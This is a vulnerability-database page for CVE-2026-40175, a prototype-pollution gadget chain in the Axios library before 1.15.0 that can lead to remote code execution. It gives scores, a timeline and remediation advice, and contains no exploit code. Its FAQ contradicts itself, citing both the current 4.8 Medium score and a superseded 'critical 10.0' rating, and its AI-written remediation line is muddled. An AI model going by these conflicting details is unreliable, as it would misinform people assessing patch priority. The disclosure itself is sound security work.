What is the CVSS score of CVE-2026-40175?

CVE-2026-40175 has a CVSS 3.1 base score of 4.8 (Medium). CVSS vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N. EPSS exploitation probability: 0.2%.

Which versions of Node.js are affected by CVE-2026-40175?

Axios HTTP client library versions before 1.15.0 contain a critical remote code execution vulnerability (CVSS 10.0) exploitable by unauthenticated network attackers, potentially enabling full system…. A patch is available.

Node.js CVE-2026-40175

EUVD-2026-21573 MEDIUM

HTTP Response Splitting (CWE-113)

2026-04-10 GitHub_M

GHSA-fvcv-3m26-pcqx

RCE Node.js

4.8

CVSS 3.1

CVSS VectorNVD

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Attack Vector

Network

Attack Complexity

High

Privileges Required

None

User Interaction

None

Scope

Unchanged

Confidentiality

Low

Integrity

Low

Availability

None

Lifecycle Timeline

Severity Changed

Apr 16, 2026 - 19:22 NVD

CRITICAL MEDIUM

CVSS changed

Apr 16, 2026 - 19:22 NVD

10.0 (CRITICAL) 4.8 (MEDIUM)

Patch released

Apr 11, 2026 - 02:30 nvd

Patch available

EUVD ID Assigned

Apr 10, 2026 - 20:15 euvd

EUVD-2026-21573

Analysis Generated

Apr 10, 2026 - 20:15 vuln.today

CVE Published

Apr 10, 2026 - 19:23 nvd

CRITICAL 10.0

Blast Radius

ecosystem impact

† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth

273 npm packages depend on axios (189 direct, 84 indirect)

Ecosystem-wide dependent count for version 1.0.0.

DescriptionNVD

Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.0, the Axios library is vulnerable to a specific "Gadget" attack chain that allows Prototype Pollution in any third-party dependency to be escalated into Remote Code Execution (RCE) or Full Cloud Compromise (via AWS IMDSv2 bypass). This vulnerability is fixed in 1.15.0.

AnalysisAI

Remote code execution affects Axios HTTP client library versions prior to 1.15.0 via gadget chain escalation of prototype pollution vulnerabilities in third-party dependencies. Unauthenticated network attackers can exploit this chaining mechanism to achieve full remote code execution or cloud compromise through AWS IMDSv2 bypass. …

RemediationAI

Within 24 hours: Inventory all applications and dependencies using Axios versions prior to 1.15.0 across development, staging, and production environments. Within 7 days: Upgrade Axios to version 1.15.0 or later on all systems; if upgrade is blocked by compatibility issues, implement network segmentation to restrict HTTP client access and disable AWS IMDSv2 fallback by enforcing IMDSv2-only enforcement. …

Analysis

Detailed AI-generated intelligence summary covering attack vector, impact assessment, affected versions, remediation steps, and indicators of compromise.

POChttps://••••••••••.com/exploit

PATCHhttps://••••••••••.com/patch

ADVISORYhttps://••••••••••.com/advisory

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

Vendor StatusVendor

CVE-2026-40175 vulnerability details – vuln.today

Back

Node.js CVE-2026-40175

CVSS VectorNVD

Lifecycle Timeline

Blast Radius

DescriptionNVD

AnalysisAI

RemediationAI

Full analysis requires sign-in

Vendor StatusVendor

Share

External POC / Exploit Code